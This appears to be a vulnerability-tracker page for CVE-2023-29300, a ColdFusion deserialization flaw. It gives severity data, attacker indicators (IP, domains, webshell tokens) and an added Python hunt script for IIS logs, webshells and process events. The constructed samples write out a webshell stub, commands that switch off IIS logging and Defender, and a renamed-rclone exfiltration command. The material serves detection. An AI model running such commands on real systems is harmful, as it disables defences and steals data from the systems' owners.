CVE-2023-29300
published 2023-07-12


Priority: P1 (99) · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Ransomware
CISA Known Exploited Vulnerability, due 2024-01-29
Exploited in the wild
EPSS: 99.98% (100.0th percentile)
Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.

Affected

4 ranges

Vendor   Product      Version range   Fixed in
adobe    coldfusion   <=              cf2023U1
adobe    coldfusion
adobe    coldfusion
adobe    coldfusion

Detection & IOCs (extracted from sources)

path: /CFIDE/adminapi/_datasource/setmsaccessRegistry.cfm
path: /CFIDE/adminapi/_datasource/setsldatasource.cfm
path: /CFIDE/adminapi/_datasource/setdsn.cfm
path: /CFIDE/adminapi/_datasource/formatjdbcurl.cfm
path: /CFIDE/adminapi/_datasource/getaccessdefaultsfromRegistry.cfm
path: /CFIDE/adminapi/_datasource/geturldefaults.cfm
path: /CFIDE/adminapi/customtags/l10n.cfm
path: /CFIDE/adminapi/serverinstance.cfc
path: /CFIDE/adminapi/servermonitoring.cfc
ip: 103.255.177.55
port: 6895
domain: mooo-ng.com
domain: redteam.tf
domain: h4ck4fun.xyz
hash: 7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
hash: 590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
hash: 808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e
hash: 4f22fea4d0fadd2e01139021f98f04d3cae678e6526feb61fa8a6eceda13296a
filename: UA4fp7R.aspx
filename: WRBYTR5750images.aspx
bytes: ONEPIECE
bytes: x_best_911
snort: Adobe.ColdFusion.CVE-2023-29300.Insecure.Deserialization
  • Post-exploitation webshells were dropped into wwwroot\Images as .aspx files, concealed with steganography. Alert on .aspx file creation in image directories and on w3wp.exe spawning OS commands such as whoami.
  • The webshells in this campaign embed the ASCII strings 'ONEPIECE' and 'x_best_911' as operational response tokens. Scan .aspx files on web servers for these embedded strings.
  • Malware payloads are Base64-encoded and delivered from a public HTTP File Server (HFS) at 103.255.177.55:6895. Block this IP/port and alert on Base64-encoded payloads in ColdFusion POST bodies.
  • The post-exploitation defence-impairment script 'i.bat' disables IIS logging, Defender, Sysmon and other security tools. Alert on appcmd.exe setting dontLog:True and on several Set-MpPreference cmdlets executed in sequence.
  • Rclone renamed to svhost.exe or scvhost.exe was used to exfiltrate data to MegaSync. Alert on processes named svhost.exe or scvhost.exe (not the legitimate svchost.exe) making outbound cloud-storage connections.
  • In-the-wild exploitation of CVE-2023-29300 has been observed chained with CVE-2023-29298 (access control bypass): the bypass is used to reach the adminapi endpoints that are then targeted for deserialization, so both CVEs should be treated as one attack chain.
  • Attribution of CVE-2023-29300 exploitation to Storm-0501 is assessed with uncertainty. Microsoft notes the initial access was 'possibly CVE-2023-29300 or CVE-2023-38203', so detections should cover both deserialization CVEs.
  • The Huntress incident had insufficient logging, which prevented definitive confirmation that CVE-2023-29300 was the initial access vector; the CFIDE endpoint hits in the logs are circumstantial evidence only.
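The detection notes above can be turned into concrete hunt logic. The following Python script is an added example, not code from this tracker page or from any of the cited vendors. It runs three checks over constructed sample data: IIS W3C log lines matched against the listed adminapi paths (after collapsing repeated slashes and `/./` segments, so a CVE-2023-29298-style bypass path still hits; that normalisation is an assumption about how the bypass varies the path), .aspx files checked for the image-directory location and the 'ONEPIECE' / 'x_best_911' tokens, and Sysmon-style process events checked for w3wp.exe spawning shells, appcmd dontLog:True, bulk Set-MpPreference and the svhost.exe / scvhost.exe rclone aliases. The W3C field order, the event keys and the threshold of three Set-MpPreference calls are assumptions, and all log lines, file contents and events are constructed.

```python
"""Hunt logic for the CVE-2023-29300 post-exploitation indicators listed above.

Added example, not from the tracker page or any vendor tool. All sample data
below is constructed; W3C field order and event keys are assumptions.
"""
import re
from posixpath import normpath

# Adminapi endpoints from the IOC list, matched after normalisation so a
# CVE-2023-29298-style bypass path (extra '/' or '/./') still matches.
CFIDE_PATHS = {p.lower() for p in (
    "/CFIDE/adminapi/_datasource/setmsaccessRegistry.cfm",
    "/CFIDE/adminapi/_datasource/setsldatasource.cfm",
    "/CFIDE/adminapi/_datasource/setdsn.cfm",
    "/CFIDE/adminapi/_datasource/formatjdbcurl.cfm",
    "/CFIDE/adminapi/_datasource/getaccessdefaultsfromRegistry.cfm",
    "/CFIDE/adminapi/_datasource/geturldefaults.cfm",
    "/CFIDE/adminapi/customtags/l10n.cfm",
    "/CFIDE/adminapi/serverinstance.cfc",
    "/CFIDE/adminapi/servermonitoring.cfc",
)}
WEBSHELL_TOKENS = (b"ONEPIECE", b"x_best_911")  # response tokens from the campaign
RCLONE_ALIASES = {"svhost.exe", "scvhost.exe"}  # renamed rclone; legit svchost.exe excluded
SHELL_CHILDREN = {"whoami.exe", "cmd.exe", "powershell.exe"}
MPPREF_THRESHOLD = 3  # assumption: three Set-MpPreference calls in one batch is abnormal


def normalize_uri(stem: str) -> str:
    """Drop the query string, collapse '//' and '/./', lower-case for comparison."""
    stem = stem.split("?", 1)[0]
    return normpath(re.sub(r"/+", "/", "/" + stem)).lower()


def hunt_iis_log(lines):
    """Return (client_ip, method, raw_uri) for requests that reach a listed endpoint.
    Assumed W3C field order: date time s-ip cs-method cs-uri-stem cs-uri-query
    s-port cs-username c-ip cs(User-Agent) sc-status."""
    hits = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split()
        if len(f) >= 9 and normalize_uri(f[4]) in CFIDE_PATHS:
            hits.append((f[8], f[3], f[4]))
    return hits


def scan_webshell_candidates(files):
    """files: {path: bytes}. Flag .aspx files under an Images directory and any
    .aspx carrying a campaign token. Returns [(path, [reasons])]."""
    findings = []
    for path, data in files.items():
        low = path.lower()
        if not low.endswith(".aspx"):
            continue
        reasons = []
        if "\\images\\" in low or "/images/" in low:
            reasons.append("aspx in image directory")
        tokens = [t.decode() for t in WEBSHELL_TOKENS if t in data]
        if tokens:
            reasons.append("embedded token(s): " + ", ".join(tokens))
        if reasons:
            findings.append((path, reasons))
    return findings


def check_process_events(events):
    """events: ordered dicts with Image, ParentImage, CommandLine (Sysmon EID 1 style).
    Returns one alert string per rule match."""
    alerts, mppref_calls = [], 0
    for e in events:
        image = e["Image"].rsplit("\\", 1)[-1].lower()
        parent = e.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        cmd = e.get("CommandLine", "")
        if parent == "w3wp.exe" and image in SHELL_CHILDREN:
            alerts.append(f"w3wp.exe spawned {image}: {cmd}")
        if image == "appcmd.exe" and "dontlog:true" in cmd.lower():
            alerts.append(f"IIS logging disabled: {cmd}")
        if image in RCLONE_ALIASES:
            alerts.append(f"rclone masquerade as {image}: {cmd}")
        mppref_calls += cmd.lower().count("set-mppreference")
    if mppref_calls >= MPPREF_THRESHOLD:
        alerts.append(f"bulk Defender tampering: {mppref_calls} Set-MpPreference calls")
    return alerts


# --- constructed sample data (not real logs) ---
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2023-07-13 02:14:09 10.0.0.5 GET /index.cfm - 80 - 198.51.100.7 Mozilla/5.0 200
2023-07-13 02:14:11 10.0.0.5 POST //CFIDE/adminapi/_datasource/setdsn.cfm - 80 - 198.51.100.7 python-requests/2.31 200
2023-07-13 02:14:12 10.0.0.5 GET /CFIDE/./adminapi/serverinstance.cfc method=getinstance 80 - 198.51.100.7 python-requests/2.31 200
2023-07-13 02:15:01 10.0.0.5 GET /images/logo.png - 80 - 203.0.113.9 Mozilla/5.0 200
""".splitlines()
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\Images\UA4fp7R.aspx": b'<%@ Page Language="C#" %><% Response.Write("ONEPIECE"); %>',
    r"C:\inetpub\wwwroot\Images\logo.png": b"\x89PNG\r\n\x1a\n",
    r"C:\inetpub\wwwroot\Default.aspx": b'<%@ Page Language="C#" %><html>hello</html>',
}
PS, CMD = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe", "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "w3wp.exe -ap DefaultAppPool"},
    {"Image": r"C:\Windows\System32\whoami.exe", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "CommandLine": "whoami"},
    {"Image": r"C:\Windows\System32\inetsrv\appcmd.exe", "ParentImage": CMD, "CommandLine": "appcmd set config /section:httpLogging /dontLog:True"},
    {"Image": PS, "ParentImage": CMD, "CommandLine": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"Image": PS, "ParentImage": CMD, "CommandLine": "powershell Set-MpPreference -DisableIOAVProtection $true"},
    {"Image": PS, "ParentImage": CMD, "CommandLine": "powershell Set-MpPreference -DisableBehaviorMonitoring $true"},
    {"Image": r"C:\Users\Public\svhost.exe", "ParentImage": CMD, "CommandLine": r"svhost.exe copy C:\Finance mega:loot"},
    {"Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    print(hunt_iis_log(SAMPLE_IIS_LOG))
    print(scan_webshell_candidates(SAMPLE_FILES))
    print("\n".join(check_process_events(SAMPLE_EVENTS)))
```

On the sample data the log hunt returns the two adminapi requests from 198.51.100.7 (both written with bypass-style paths), the file scan flags only UA4fp7R.aspx (image directory plus embedded token), and the process check raises four alerts: the w3wp.exe to whoami.exe spawn, the appcmd dontLog:True call, the svhost.exe rclone alias, and the three Set-MpPreference calls taken together. The legitimate svchost.exe event does not fire, which is the point of matching the misspelled aliases exactly rather than by substring.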

CVSS provenance

nvd (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL
cisa: 9.8 CRITICAL